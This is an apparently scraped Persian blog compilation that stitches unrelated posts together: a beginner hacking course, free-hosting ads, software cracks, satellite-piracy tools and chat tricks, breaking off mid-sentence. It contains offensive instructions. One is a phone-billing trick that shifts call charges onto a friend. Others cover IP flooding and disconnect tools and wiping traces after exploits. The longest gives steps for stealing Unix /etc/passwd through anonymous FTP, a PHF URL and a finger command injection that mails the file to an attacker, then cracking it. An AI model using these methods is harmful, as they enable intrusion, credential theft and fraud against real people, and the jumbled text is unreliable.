تلنت کردن معمولا اولين کاری است که يک هکر برای هک کردن يک سايت انجام می‌دهد، زيرا بعضی از پورت‌ها در صورت بسته نبودن روی آن سرور، معمولا حاوی اطلاعات بسيار مهمی هستند.
همين الان شروع کنيد و مثل يک هکر واقعی به کامپبوتر‌های مختلف و پورت‌های گوناگون تلنت کنيد. مخصوصا اگر پورت ۷۹ (finger) روی يک کامپيوتر باز بود، مرا هم خبر کنيد (-;

 
◊ تقسيم‌بندی انواع حملات

اولين نکته‌ای که لازم است بگويم اينه که وقت خود را برای هک کردن کامپيوتر‌های کلاينت هدر ندهيد (اگرچه برای افراد مبتدی کار با نرم‌افزاری مثل Sub7 زياد هم بد نيست ولی نبايد زياده‌روی کرد) علت هم اينه که هربار که به اينترنت وصل می‌شوند ip جديدی به‌ آنها اختصاص پيدا می‌کنه و زحماتتون هدر می‌ره (البته برای جلوگيری از اين امر هم روشهايی هست که در آينده ايشالله ميگم).
حالا تقسيم‌بندی:
۱- حمله به روش Denial of Service Attack) DoS)
۲- حمله به روش Exploit
۳- حمله به روش Info Gathering (تلنت کردن يکی از مثالهای آن است که امروز آموختيد)
۴- حمله به روش Disinformation

در مورد هرکدام به‌زودی توضيح می‌دم. C,Linux,TCP/IP يادتون نره

درس شماره ۱

- خلاصه درس: چند نکته اوليه را بررسی می‌کنيم. از جمله تعريف هک و کارهايی که همزمان با خواندن اين آموزش‌ها بايد انجام دهيد.
 
◊ ترمينولوژی (اصطلاح‌شناسی)

- Hacker کيست ؟
هکر کسی است که با سيستم های کامپيوتری آشناست و می‌تواند با روش‌هايی خاص (بدون اجازه) وارد آنها شود... اين انسان می‌تواند خوب يا بد باشد ( در هر حال هکر است )

- سوال: يک هکر از چه راهی وارد يک سيستم می‌شود؟
از راه شبکه (نه بابا ! )
بايد توجه کنيد که هر سيستم کامپيوتری (به عبارت بهتر هر سيستم عامل) به هر حال محصول کار تعدادی انسان است و حتما دارای تعدادی bug (خطاهايی که بعد از ارائه محصول به بازار به تدريج کشف می‌شوند) خواهد بود. بعد از اينکه يک باگ مشخص شد، شرکت ها نرم‌افزارهايی را به‌سرعت (در عرض چند ساعت ) ايجاد می‌کنند تا مشکل رفع شود اين‌ها را patch می‌گويند. و بعد مديران شبکه (Wbemasters) در عرض چند روز تا چند سال (آين آخری در مورد ايرانه) آنها را download کرده و مشکل را حل می‌کنند. در اين فاصله هکرها دمار از روزگار اين سايت‌ها در می‌اورند...

- تعريف چند اصطلاح:

*** Hacker واقعی = سامورايی :
کسی که هدفش از نفوذ به سيستم‌ها نشان دادن ضعف سيستم‌های کامپيوتری است نه سوءاستفاده ...

*** Wacker (واکر):
کسی که هدفش از نفوذ به سيستم‌ها، استفاده از اطلاعات آن سيستم‌هاست (جرو هکر‌های کلاه‌ سياه )

*** Cracker (کراکر):
کسی که هدفش از نفوذ به سيستم‌ها، خرابکاری و ايجاد اختلال در سيستم‌های کامپيوتری است. (جرو هکر‌های کلاه‌ سياه )

*** Preaker :
از قديمي‌ترين هکرها هستند که برای کارشان نياز (و دسترسی) به کامپيوتر نداشتند و کارشان نفوذ به خطوط تلفن برای تماس مجانی، استراق‌سمع و ... بود. اين جزو آموزش من نيست چون کار خيلی بديه (-;

 
◊ تقسيم‌بندی

- انواع کامپيوتر‌های شبکه:
=> کامپيوترهای Server : کامپيوترهايی که کارشان تامين اطلاعات در شبکه است، مثلآ کامپيوترهايی که سايت‌ها را نگه می‌دارند.
=> کامپبوتر‌های Client : کامپيوترهايی که استفاده کننده هستند مثل همين کامپيوتر خودتان که داريد ازش کار می‌کشيد.

- انواع سيستم‌ عامل‌هايی که Server ها از آن استفاده‌ می‌کنند:

=> سيستم‌های فعلی:
* خانواده Unix (مثل FreeBSD , Linux )
* خانواده Windows (مثل WinNT, Win2000 )
* Sun Solaris
* OsMac
=> سيستم‌های قديمی (منقرض شده - آخيش ! ):
AIX, IRIS, DEC10, DEC20 , ...

- سوال: کدام‌ها را بايد ياد گرفت؟
Win2000, Unix(Linux) را بايد ياد بگيريد. پيشنهاد من اين است که Win2000و RedHat Linux را روی کامپيوتر خود همزمان داشته باشيد.

 
◊ زنگ ‌تفريح

- تقسيم بندی من برای هکر ها:

۱- جوجه‌هکرها (احمق کوچولوها):
توانايی‌ها: بلدند از Sub 7 , 187 استفاده کنند و فکر کنند ديگه همه‌چی رو ياد گرفته‌اند !

۲- خروس‌هکر‌ها يا مرغ‌هکرها (احمق‌های بزرگتر):
توانايی‌ها: Mail Box را هم می‌توانند Bomb کنند ... ماشاءالله !

۳- هکرهای قابل‌احترام ( مثل خود شما):
دارند ياد می‌گيرند و هنوز ۲،۳ سال کار دارند.

۴- هکرهای پيش‌کسوت:
ديگه آفتاب لبه بومه ... هکرهای قابل احترام را دوس دارند ...

 
◊ Command Prompt چيست؟

در بسياری از درس‌های آينده از Command Prompt (خط فرمان) ويندوز استفاده خواهيم کرد. برای باز کردن آن يکی از روش‌های زير را به کار بريد:

۱- مسير زير را در ويندوز طی کنيد:

Start > Programs > Accessories > Command Prompt

۲- در قسمت Run بنويسيد: command يا cmd

 
◊ FAQ

- چه چيزهايی را بايد داشته باشم تا شروع کنم؟

۱- Win2000 , Linux را روی کامپيوتر خود نصب کرده و شروع به يادگيری کنيد.
۲- شروع به يادگيری زبان C کنيد.
۳- شروع به يادگيری TCP/IP کنيد. (يک کتاب بخريد )
۴- مهمترين چيز علاقه به طی کردن يک را بسييييييار طوووووولانی

اینم از یه سرویس فضای مجانی که ان شاا.. کمک بکنه پارسا اسپیس خلاص بشه! پرشین گیگ رو که خوردین.دیگه قات زده جدیدا.حالا اینم یه امتحان بکنید: ۲ گیگ فضا + ایمیل + یه مشت چیزهای اضافه = مجانی برو امتحان کن نظر یادت نره عزیز .
آدرس خود سایت : www.diino.com
آدرس فرم ثبت نام : https://dshop.diino.net/user/register/default

سلام به همه دوستان عزيز. يه آپلود سنتر يكي از دوستاي گلم زده كه واقعا ساده بي نظير و با سرعتي باور نكردني هست. آخه ناسلامتي هاستش مثل مال ما از سرورهاي سايت هاست ماي وبسايت هست كه در كشور هلند نگهداري ميشه.من تابحال هاست از اين بهتر نديده بودم! خدا پدر جابر عزيز رو بيامرزه كه به ما همچين هاست تكي رو داد. بنده خدا خودشم هرچي ميگه هاست ما خوبه ملت باور نمي كنن! در ضمن من خودم هم به طور مستقيم از همين هاست ميدم بهتون هر كي خواست ياعلي. خلاصه خيلي مطمئن هست برين مثل من عكسهاتون و فايلهاتون رو توش آپلود كنيد و حالشو ببريد.

نوع سايت : Free WebHosting - No Ads

آدرس سايت : http://www.50webs.com

فضای رايگان : ۶۰ مگابايت

پهنای باند : نامحدود

تبليغات : ندارد

پشتيبانی : HTML

حداکثر اندازه فايل : 300 کيلوبايت

پشتیبانی از FTP : دارد.

کنترل پنل : دارد.

آدرس شما : yourname.50webs.com و yourname.50webs.org

نظر ما : اين سايت هم از لحاظ پهنای باند بالا و هم سرعت بالا در آپلود فایلها و هم در نداشتن تبلیغات دارای امتیاز ویژه ای است . تنها مشکلات این سایت پایین بودن حداکثر حجم فایلها بوده و همچنین ورود کاربران به سایت کمی دچار مشکل میباشد. سرعت بارگذاری و نمایش صفحات هم در حد متوسط میباشد.

اين يک داستان واقعي است که در ژاپن اتفاق افتاده است.

شخصي ديوار خانه اش را براي نوسازي خراب مي کرد.خانه هاي ژاپني داراي فضايي خالي بين ديوارهاي چوبي هستند. اين شخص در حين خراب کردن ديوار  در  بين ان مارمولکي را ديد که ميخي از بيرون به پايش کوفته شده است.

دلش سوخت و يک لحظه کنجکاو شد .وقتي ميخ را بررسي کرد تعجب کرد اين ميخ ده سال پيش هنگام ساختن خانه کوبيده شده بود!!!

چه اتفاقي افتاده؟مارمولک ده سال در چنين موقعيتي زنده مونده !!!در يک قسمت تاريک بدون حرکت.چنين چيزي امکان ندارد و غير قابل تصور است.متحير از اين مساله کارش را تعطيل و مارمولک را مشاهده کرد.

تو اين مدت چکار مي کرده؟چگونه و چي مي خورده؟همانطور که به مارمولک نگاه مي کرد يکدفعه مارمولکي ديگر با غذايي در دهانش ظاهر شد .!!!مرد شديدا منقلب شد.ده سال مراقبت. چه عشقي ! چه عشق قشنگي!!!اگر موجود به اين کوچکي بتواند عشق به اين بزرگي داشته باشد پس تصور کنيد ما تا چه حدي مي توانيم عاشق شويم اگر سعي کنيم...

براي اينكار بايد يه كارهايي انجام بدين به اين صورت :
1- ابتدا موبايل اون شخصي را كه مي خواهيد هزينه ها را بپردازد بر داريد و شماره اي را كه ميخواهيد هزينه اش برداشته بشه را بگيريد البته قبلش يك + يا 90+ اضافه كنيد مثلاْ به اين صورت :09198762536 + كه در نتيجه ديگه هزينه به صورت حساب اين شماره اضافه نميشه و همش ميره به حساب كسي كه شما اين شماره را با موبايلش گرفتيد البته اين كار با دزدي فرقي نداره اما صد در صد جواب ميده و خود مخابرات هم اعلام كرده که همچنان راهي براي اين مشكل پيدا نكردن ! پس از امروز موبايلتون رو دست همه کس ندين !
اين روش کاملا امتحان شده!

مثال :

مثلا شماره گوشي شما بدين صورت است : 09198762536 ، براي اينكه وقتي با دوستتون تماس مي گيريد شمارتون نيفته گوشييشو برداريد ، و با گوشيش اين شماره رو بگيريد :

09198762536+ ( در واقع اين شماره همون شماره شماست ، منتهي يه + بهش اضافه شده ) ، تو دفترچه تماسها گوشيش هم به شماره خودتون يه + اضافه كنيد .

از اين پس هر وقت شماره 09198762536 به گوشي دوستتون زنگ بزنه ،‌حسابش به پاي دوستتون ميفته .

بازم مي گم اين كار با دزدي فرقي نداره .

در اين روش هر وقت فيش موبايلتون از حد معمول بيشتر شد بريد و پرينت اونو از مخابرات بخواين و وقتي پرينت رو گرفتين ببينين قسمت (بدهکار) و (بستانکار) موبايلتون با هم برابره يا نه اگه با هم برابر نبود مسبب اونو حلال کنين که اون دنيا ديگه نمک گيرتون نشه.

۱.ابتدا فايل زير را دانلود كرده و با فرانت پيج يا نوت پد بازش بكنيد.

www.linkoo.persiangig.com/random.js

2.شما در فايل 125 تا نوشته مختلف مي بينيد.مي توانيد آن نوشته ها را تغيير ويا تعدادشان را كم و يا زياد بكنيد ورنگ و سايزشون رو هم همينطور.
3.همينطور مي توانيد به جاي آنها جك بذاريد و آپلود بكنيد و شما هم ارزه كننده جك تصادفي براي كاربرانتان باشيد.
4. ديگه به همين راحتي بود من فقط فايلشو براتون آماده كردم.

آيا با دانستن IP يك نفر ميشه از طريق برنامه Sub Seven كسي را هك كرد؟

 آيا كسي IP من را بداند مي تواند مرا هك كند ؟

 يكي IP من را دارد و مي گويد اگر فلان كار را نكني مانيتور تو رو مي سوزانم آيا ميتونه ؟  و ...

    كارهایی  كه میتوان با داشتن IP انجام داد را برايتان شرح بدم

   قطع ارتباط شخص با اينترنت : شما ميتوانيد با استفاده از برنامه هايي مانند IP Disconnect يا Rocket و دانستن IP شخص مقابل او را از اينترنت بيرون بندازيد.

   كند كردن سرعت ارتباط شخص با اينترنت : با استفاده از برنامه هايي مانند Vai-te-ja-icmp Bomber و... با فرستادن Packet هاي بسيار در يك زمان سرعت شخص را عملا كاهش دهيد ...

   پيدا كردن پورت هاي باز : وقتي كه IP يك فرد را داشته باشيد ميتوانيد با استفاده از برنامه هاي Port Scanner سيستم شخص مقابل را جستجو كنيد و اگر پورت بازي وجود داشت در صورت امكان از آن استفاده كنيد .

   يافتن تروجان فعال در سيستم مقابل : خب مانند بالا بعضي از برنامه ها با دادن IP يك دستگاه آن دستگاه را براي تروجان هاي فعال جستجو مي كند و اگر پورت بازي مربوط به يك تروجان را پيدا كند به شما گزارش ميدهند .

اما آيا ميتوان با دانستن IP يك شخص با برنامه هايي مانند Sub Seven و.. به سيستم قرباني حمله كرد؟ در حالت عادي خير ، يعني اينكه براي كار كردن با برنامه هاي تروجان مانند Sub Seven بايد يك Server در سيستم قرباني فعال شود ( فايل سرور فايلي است كه با برنامه هاي تروجان مانند Sub Seven ساخته شده و بايد برروي سيستم قرباني اجرا شود و پس از اجراي فايل سرور يك پورت در سيستم قرباني باز ميشود كه راه نفوذ شخص را باز مي كند ) پس در نتيجه اگر قبلا فايل سروري برروي سيستم قرباني باز نشده باشد يا اينكه فايل سرور برروي سيستم او موجود نباشد شما هيچ كاري با برنامه هاي Trojan نميتوانيد بكنيد .

 چگونه كاري كنيم كه هيچ كسي نتواند آسيبي از طريق دانستن IP ما به ما برساند؟ خب تنها كاري كه شما بايد انجام بدهيد استفاده از يك فاير وال ( ديوار آتش ) Firewall در سيستم خودتان ميباشد اين برنامه ها پورتهاي باز شما را بسته و شما را در مقابل حمله احتمالي از طريق IP و همچنين دسترسي برنامه هاي مشكوك را به اينترنت ( براي ارسال يا دريافت اطلاعات ) محدود مي كند . برنامه هايي مانند ZoneAlarm يا Tiny Personal Firewall .

طریقه وارد شدن به روم های یاهو مسنجر

به در خواست یکی از دوستان تصمیم گرفتم آموزش رفتن به روم های یاهو مسنجر رو براتون توضیح بدم.

برای رفتن به روم باید ابتدا با آی دی خود لوگین شوید.بعد از اینکه وصل شدید و گزینه های بالای یاهو مسنجر بر روی گزینه messenger کلیک کنید تا منوی آن باز شود و بعد موس را بر روی گزینه Yahoo!chat برده  و بعد بر روی گزینه Join Room  کلیک کنید .

به از این صفحه Join Room باز میشود.برای رفتن به روم های ایرانی باید مراحل زیر را انجام دهید.

۱- ابتدا بر روی + (بعلاوه) کنار فولدر Regional کلیک کنید تا این فولدر باز شود بعد بر روی فولدر Asia کایک چپ کنید و صبر کنید در قسمت Yahoo!Rooms (قسمت سمت راست) گزینه Asia Global Chat ظاهر شود بعد بر روی + کنار آن کلیک کنید تا تمام روم ها نمایان شود .

۲-برای ورود به یکی از این روم ها باید بر روی آن کلیک کنید و بعد بر روی گزینه Go To Room  در پایین کلیک کنید.

۳- بعد صفحه ای جدید به نام Connecting to Yahoo!chat باز میشود که شما باید پس از لود شدن کامل آن بر روی گزینه Enter Chat کلیک کنید.

اگر روم پر نباشد شما با موفقیت وارد روم میشوید.
 
ارسال BUZZ به شکل پشت سر هم برای طرف مقابل
یکی از توانمندی های یاهو مسنجر هنگام چت استفاده از دکمه BUZZ به نوعی برای آزار طرف مقابل است! اما خود یاهو این گزینه را به نوعی تنظیم کرده است که پس از زدن دکمه تا 15 ثانیه امکان استفاده مجدد از آن وجود ندارد. در این ترفند قصد داریم روشی جالب را به شما معرفی کنیم که با بهره گیری از آن میتوانید  بدون استفاده از برنامه جانبی خاصی به نوعی این محدودیت زمانی را از بین ببرید و به شکل پیاپی و پشت سر هم برای طرف مقابل BUZZ بفرستید!

برای این کار:
کافی است پس از انتخاب ID شخص از روی لیست و باز شدن پنجره PM ، یکبار دکمه BUZZ را بزنید.
اکنون به شکل سریع پنجره چت را بسته و مجدد روی ID شخص را باز کنید و BUZZ بزنید.
اگر این کار - یعنی باز و بسته کردن پنجره چت فرد مقابل و زدن دکمه BUZZ - را به شکل پشت سر هم و سریع انجام دهید به تعداد دفعات اینکار عمل BUZZ برای فرد مقابل صورت میگیرد.
فرد مقابل نیز اصلأ متوجه نمیشود که شما هر بار پنجره چت را میبندید و باز میکنید.

كاربرد	اندازه	نرم افزار	رديف
همان كار اسكاي نت را مي كند	۱۰۰كيلوبايت	Betasky 0.9a	۱
آخرين ورژن اسكاي نت	327 kb	skynet0.91	۲
كدهاي فعال اسكاي نت	86 kb	SkyNet Source Code	۳
استرم ريدر ۸ كارت رسيور	736 kb	SkyNet StreamReaders	۴
آي پي هاي موجود در تركست	8 kb	SkyNet Rules & Regex files	۵
اسكاي نت جديد براي ويندوز ايكس پي	364 kb	SkyNet R32 1.22 Windows	۶
اسكاي نت براي لينوكس	161 kb	SkyNet R32 1.21 Linux	۷
	156 kb	SkyNet 0.92 Unofficial	۸
اسكاي نت براي سيستمهاي لينوكس	251 kb	SkyNet 0.91 for LinuX	۹
	525 kb	SkyNet Fish2 0.44	۱۰
	381 kb	Manna 0.3829	۱۱
	1.9 MB	Manna 0.3920	۱۲
	5.1 MB	SkyGrabber XP v2.8.4	۱۳
	3.3 MB	SkyGrabber XP v2.7.5	۱۴
	658 kb	SpaceStream v.0.15.R4	۱۵
	232 kb	DataSky v0.009	۱۶

- تراش و حذف محتويات History و فايلهاي موقت اينترنت در قسمت Internet Options
به History و TIF رفته و Temporary Internet Files را پاك كنيد و يا در داخل شاخه ويندوز محتويات آنها را پاك مي كنيد هنوز ردپاهايي باقي است اين ردپاها مي‏تواند شامل فايلهاي موقت سرگردان است زماني كه توسط exploit هاي cgi وارد مي شويد پديد مي‏آيند از خراب شدن ليستها و يا محتويات فايلهاي متعدد index.dat ديتا بيس مي شوندکه در اين زيرشاخه هستند

\WINDOWS\History\index.dat

\WINDOWS\Temporary Internet Files\index.dat

\WINDOWS\Cookies\index.dat

\WINDOWS\History\index.dat

\WINDOWS\Temporary Internet Files\index.dat 

\Documents and Settings\\Cookies\index.dat

\Documents and Settings\\Local Settings\History\History.IE5\index.dat

\Documents and Settings\\Local Settings\History\History.IE5\************\index.dat

\Documents and Settings\\Local

Settings\History\History.IE5\************\index.dat

\Documents and Settings\\Local

Internet Files\Content.IE5\index.dat
و تغييردررجيستر

ProgDVB5.09

rules.zip

عده ای از سایتهای با آی پی که فقط بقل اسکای نت باید کپی کنی اگه پشت اون قبلی یا هم اضافه کردی کردی

نصب دیش:

برای گرفتن این ماهواره کافیه دیش رو بزارید رو به قبله و ارتفاع دیش رو نسبت به هاتبرد 7-8 سانت

 پایین بیارید تا سر دیش بالا بره ساعت lnb هم 6 هستش.

اطلاعات:

در این جهت علاوه بر یک کانال دیتای مناسب بیش از 100 کانال با تنوع خوب رو میتوانید

داشته باشید

میزان پوشش دهی




اطلاعات بیشتر

http://www.flysat.com/turksat1c2a.php

===turksat============================
=================================

# -- 42e --
# satgate türksat
tuner=12565000,h,27282000,a
pids=8192

دوستان ویرایش جدید رو حاظر کردم
skynet for edit by nima_sh v4.6----23-01-1386 release offlin4u
all support w6
top support w3
best support rapidshare

درون فایل یک آمورش مربوط به تنظیم سوپپچ اسکای استار
اسکای نت 0.93 ویرایش 4.6 permium
اسکای نت skynet0897b6sbf0_19e ویرایش 4.6 permium

موجود میباشد
از جدید ترین قسمت های اضافه شده میشه به فرکانس 11344 و تمامی مک های فارسی w6 اشاره کرده و ip جدید سایت های موزیک و فیلم ایرانی حدود 75 خط به رولز اضافه شده است
دانلود

AusLogics BoostSpeed نرم افزاری است ایده آل و جالب با امکانات و کارایی های مختلف که به شما اجازه ی افزایش سرعت سیستم و اینترنت را می دهد. کامپیوتر شما را سریع تر می کند و سرعت ارتباط اینترنتی شما را بهینه می کند. ابزار های این نرم افزار : Speed Up PC With BoostSpeed : جهت افزایش سرعت کامپیوتر و همچنین افزایش سرعت خاموش کردن کامپیوتر. امکان بهینه سازی با یک Wizard مخصوص. Speed Up Internet : جهت افزایش سرعت اینترنت. همچنین سرعت دانلود را نیز افزایش می دهد و ارتباط اینترنتی شما را بهینه می کند. Block Banner Advertisements : تبلیغات مزاحم را در سایت های مختلف بلوکه و مسدود می کند. Keep Disk and Registry Clean : رجیستری ویندوز شما را از برنامه های مخرب پاک سازی می کند. Optimize Memory and Appearance : حافظه ی سیستم شما را بهینه می کند. Keep your PC fast and safe : از سیستم شما نگهداری کرده و از ورود برنامه های spyware جلوگیری می کند. System Optimization Tools : شامل ابزار های مختلف جهت بهینه سازی سیستم شما. Networks Tools : شامل ابزار های مختلف قابل استفاده در شبکه های کامپیوتری و اینترنت. دانلود برنامه کرک

دانلود

Foxit PDF Editor ابزاري مناسب جهت ويرايش اسناد PDF  است. توسط اين نرم افزار شما مي توانيد به راحتي اين فايل ها را به صورت نامحدود ويرايش كنيد، سپس آن را ذخيره نمائيد. قابليت Zoom در صفحات و همچنين قابليتي موسوم به WYSIWYG (به معناي آنچه را كه شما در صفحه نمايش مي بينيد، دقيقاً در خروجي قرار مي گيرد) از ويژگي هاي اين نرم افزار است.

برخي از امكانات و قابليت هاي اين نرم افزار :

• امكانات مختلف جهت ويرايش فايل هاي PDF
• قابليت افزودن و حذف صفحات PDF
• قابليت تغير فونت متون، رنگ و سايز آن ها
• قابليت Copy و Pste متون و ساير اشيا

براي اولين بار در ميان سايت هاي فارسي زبان، پرشين دانلود تقديم مي كند :

RedBox نام يك نرم افزار جالب مي باشد كه توسط آن مي توانيد با امكانات فوق العاده كار هاي خود را زمان بندي و مديريت كنيد. اين نرم افزار به شما اجازه دسته بندي كار هاي خود را با توجه به روز و تاريخ معين مي دهد و شما را از خطر فراموشي نجات مي دهد! قابليت ديگر اين نرم افزار ذخيره آدرس و تلفن افراد، سايت و ايميل در ديتابيس اين نرم افزار است. در واقع شما يك دفتر تلفن مجزا به شكل مجازي داريد. از قابليت هاي ديگر اين نرم افزار مي توان به ذخيره كردن گزارش هاي روزانه و يادداشت هاي شما اشاره كرد.

دانلود

Restorator2007_Trial

اگر دوست داريد كه در سورس برنامه هاي دلخواهتان تغيرات ايجاد نمائيد و يا مثلاً يك نرم افزار را فارسي كنيد از نسخه جديد نرم افزار Restorator استفاده كنيد. توسط اين نرم افزار مي توانيد روي فايل هايي با پسوند .exe, .dll, .res, .rc, .dcr تغيرات خود را ايجاد نمائيد. اين نرم افزار با كارايي قدرتمند و استفاده آسان مي باشد. همچنين قابليت ديگر اين نرم افزار اين است كه پس از ايجاد عمليات ويرايشي يك نسخه پشتيبان از آن فايل تهيه مي كند تا در صورت اشكال در نسخه جديد كه شما دستكاري كرده ايد بتوانيد به راحتي از نسخه قبلي استفاده كنيد تا مشكلي پيش نيايد. امكان دستكاري كردن در متن نرم افزار ها، تصاوير نرم افزار ها، فايل هاي صوتي در نرم افزار ها و... از قابليت هاي برتر اين نرم افزار است.

کرک در ادامه مطلب

نرم افزار FinePrint یک نرم افزار حرفه ای با قابلیت های مختلف جهت مدیریت پرينت صفحات می باشد. توسط این نرم افزار می توان به راحتی کار مدیریتی صفحات را انجام داد. قابلیت Print Preview به صورت حرفه ای، حذف و افزودن صفحات، مدیریت صفحات و تنطیمات حرفه ای آن ها، استفاده آسان و محیط حرفه ای از قابلیت های این نرم افزار است. دانلود این نرم افزار به تمام افرادی که سر و کار آن ها با چاپگر است توصیه می شود.

نام نرم افزاري است شامل بيش از 27 ابزار مفيد كه نقش به سزايي در جهت بهينه سازي و افزايش سرعت ويندوز ايفا مي كند. اين نرم افزار كامپيوتر شما را سريع تر مي كند و تنها با صرف زمان چند دقيقه مي تواند سيستم را بهينه و عاري از اشكال كند. از ديگر ابزار هاي اين نرم افزار مي توان به Disk Cleaner, Registry Cleaner, Uninstall Plus, StartUp Manager, Folder Guard, Tracks Washer, Driver Backup, Auto Shutdown, Windows Manager و Process Manager اشاره كرد. داراي رابط كاربر پسند و استفاده ي آسان نيز مي باشد.

برخي از امكانات و قابليت هاي اين نرم افزار :

یک بسته 35 تایی از آیکون های زیبا و جذاب اشیاء در اندازه 128*128 با فرمت png , ico که با طرح زیبایی که دارند بسیار به کار گرافیست ها و استفاده کننده های نماد می آید. نماد های با پسوند ico را می توانید مستقیما در ویندوز یا برای استفاده نرم افزاری به کار ببرید و آیکون های با پسوند png بسیار مناسب برای کار های گرافیکی و نشان دادن هدف طراح می باشد.

يدانيم كه در مووبل تايپ تگى هايى وجود دارد كه تعداد مطالب ، نظرات و ... را نشان مي دهد ولى اين تگ ها فقط تعداد مطالب ، نظرات يك وبلاگ را نمايش مى دهند !
اما براى نمايش مطالب ، نظرات و ... كل وبلاگ ها مي توانيد از روش زير استفاده كنيد.

اول از همه يك فايل به نام db.php ايجاد مي كنيد و محتويات زير را در آن قرار مى دهيد.

کارت اینترنت مجانی
Unixيكي از سرورهايي است كه در جهان بسيار از آن استفاده مي شود در ايران و دربيشتر شهر هاي بزرگ هم ISPهايي وجود دارند كه سرور آن ها Unixباشند .بنابر اين شما مي توانيد براي هك آن ها از اين راه ها استفاده كنيد شما در اين راه احتمالا با مشكلات زيادي برخورد خواهيد كرد .من راه كامل و بي عيبي را در اختيار شما نمي گذارم براي نفوذ گر شدن بايد تلاش بسياري كرد و اين اشاره اي است كه شما را به طرف راه درست هدايت مي كند .براي هك يونيكس از اين طريق عمل مي كنند كه با روش هايي كه ذكر خواهد شد فايل حاوي Passwordها و IDها را كه به نام Passwdمي باشد دريافت كنند .اين فايل يك فايل متني است كه در آن اطلاعات بصورت رمز در آمده .وقتي شما يك فايل Passwdرا باز كنيد چنين نوشته هايي را
مي بينيد .كه بايد آن را از حالت رمز در آورد .
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Taha:3A62i9qr:1012:10:Mashhad

در اينجا مثلا Tahaنام IDو 3a62...كلمه عبور اما به صورت رمز در آمده مي باشد .
شايد فايل به شكل زير هم باشد .اما اين فايل كار را غيرممكن مي سازد.در صورتي كه به شكل زير باشد يعني در آن علامت *به جاي كلمه ي به رمز آمده به آن ها Shadowedگفته مي شود .
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Taha:*:1012:10:mashhad BFH:/home/user/Taha:/usr/local/bin/tcsh
ما فعلا مي خواهيم اين فايل را دريافت كنيم .اولين قدم اين است كه آيدي در آن ISPبراي خود دست و پا كنيم .حالا اين آيدي مي تواند متعلق به دوستمان باشد و يا يك آشناي دور .پيدا كردن رمز دوست شما به سادگي ميسر است كه در حوصله اين مقاله نمي گنجد .بعد از پيدا كردن رمز شما با آيدي دوستتان به شبكه Connectشويد .اين اتصال مي تواند يك اتصال به طريق Modem DialUp Connectionباشد .بعد از اتصال كامل وارد قسمت MS-DOS Promptشويد و فرمان زير را وارد كنيد
FTP http://www.domain.com/
كه Domainآدرس سرور ISPمي باشد سپس از شما خواسته مي شود تا آيدي خود را وارد كنيد كلمه ي Anonymousرا بزنيد .سپس وقتي درخواست كلمه عبور شد كليد Enterرا بزنيد .اگر وارد سيستم شديد موفق شده ايد در غير اين صورت جمله ي login failedدريافت مي شود .دوباره امتحان كنيد و اين بار در كادر Passwordآدرس Emailاي را وارد كنيد .اگر اين بار هم جواب نداد به جاي كلمه ي anonymousاز Userخود يعني دوستتان استفاده كنيد . احتمال دارد اين بار هم موفق نشويد .اين دفعه روش هاي فوق را براي دستور زير امتحان كنيد
FTP ftp.domain.com
اگر اين بار هم جوابي نگرفتيد با ISPتماس گرفته و سوال كنيد كه چگونه مي توانم از سرور FTPخود شما استفاده كنم چون وارد سيتمتان نمي شود اگر پرسيد براي چه مي خواهيد وارد شويد بگوييد مي خواهم از نرم افزار هاي آن استفاده كنم ولي مواظب باشيد كه نام خود را نگوييد .خلاصه تمام تلاش خود را براي فهميدن روش دستيابي به سيستم بكنيد اگر توانستيد وارد سيستم شويد به راحتي مي توانيد وارد شاخه ي مشخصي رفته و فايل Passwdها را بگيريد ولي احتمال دارد كه آن شاخه براي شما قفل شده باشد .براي كار با FTPبايد دستورات FTPرا ياد داشته باشيد .براي لسيت دستورات مي توانيد ?را تايپ كنيد .ابتدا به شاخه ي ETCبرويد مي توانيد فايل passwdرا در آنجا پيدا كنيد .اين فايل را بگيريد .اگر در آنجا نبود شاخه هاي ديگر را امتحان كنيد .ولي به احتمال زياد همانجاست .حال اگر اصلا نتوانستيد وارد FTPشويد مي توانيد اين فايل را با استفاده از قايلبيت PHFبگيريد .به اين صورت كه در Internet Browserخود آدرس زير را وارد كنيد .
http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd
اگر به اين صورت هم نتوانستيد آن را بگيريد مي توانيد از طريق Fingerاين كار را انجام دهيد .اين روش به شرطي جواب مي دهد كه Serverمورد نظر قابليت Fingerرا داشته باشد .به آدرس زير مراجعه كنيد .
www.domain.com/cgi-bin/finger
اگر اين آدرس كار نكند ديگر هيچ اميدي نيست اما اگر كار كند كادري جلوي شما ظاهر مي شود كه مي خواهد نام مورد نظر خود را بدهيد .آدرس زير را وارد كنيد .
ID@domain.com ; /bin/mail you@somewhere.com < etc/passwd
كه در اين آدرس IDشناسه كاربري يك شخص است كه مثلا مي توانيد از آيدي دوستتان استفاده كنيد domain.comآدرس نام حوزه ي ISPاست و آدرس you@somewhere.comآدرس Emailشماست مثلا اين يك نمونه است .
bfh@internet.com ; /bin/mail amir6_6_6@yahoo.com < etc/passwd
با وارد كردن اين دستور فايل Passwdبراي من به آدرس 3dhack@yahoo.com پست مي شود !
خوب حالا تا الان اگر توانسته ايد فايل را گرفته باشيد كه بهتر در غير اينصورت بايد بي خيال اين روش شويد .
حالا اگر فايل shadowedگير آورديد بقيه ي متن را نخوانيد چون كمكي به شما نمي كند و بايد از روش هاي ديگري استفاده كرد .اما اگر يك فايل مثل نمونه اولي كه در بالا بود گير آورديد مي توانيد كار خود را ادامه دهيد حالا شما نياز به يك برنامه ي Unix Password Crackerداريد معروف ترين اين نوع برنامه ها John Ripperو Cracker Jackمي باشد .اما John Ripper سريعترين نوع اين برنامه مي باشد .اين دو برنامه را مي توانيد از همان آدرس قبلي يعني www.hackersclub.com/km/frontpageبه دست بياوريد اما نمونه ي ديگري از اين نمونه برنامه ها به كتابخانه هك به نام jill_v20 ارسال شد .با استفاده از اين برنامه ها مي توانيد به هدف خود برسيد . به همين راحتي .....

قصد داریم ترفندی جالب را به شما معرفی کنیم که با استفاده از آن

میتوانید در گیم نت برای خود اکانت نامحدود ایجاد کنید و هر چه قدر میخواهید بازی کنید.
برای این کار :
کافی است در صفحه ای که از شما Username و Password خواسته میشود ،

در قسمت Username نام دلخواه خود را بنویسید و در قسمت Password بعد از تایپ

 پسورد مورد نظر عبارت 663logof3 را به آخر پسوردتان اضافه کنید.
به عنوان مثال اگر Username و Password شما  meysam  است برای نامحدود

